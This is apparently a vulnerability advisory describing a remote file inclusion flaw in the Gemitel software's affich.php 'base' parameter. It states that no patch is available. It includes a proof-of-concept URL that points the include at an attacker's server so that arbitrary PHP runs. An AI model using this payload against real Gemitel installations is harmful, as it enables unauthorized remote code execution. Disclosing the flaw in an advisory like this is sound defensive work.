A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software.
It is possible to influence the include path of certain files, which could lead to an attacker including arbitrary PHP files from an external system.
http://www.example.com/[Gemitel folder]/html/affich.php?base=http://[your server]/
Gemitel affich.php base Parameter Remote File Inclusion
Remote / Network Access
Loss of Integrity
Gemitel contains a flaw that may allow a malicious user to execute arbitrary script code. The 'affich.php' file fails to verify the 'base' parameter before it is used to include a file. This flaw may lead to a loss of Confidentiality, Integrity and/or Availability.
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.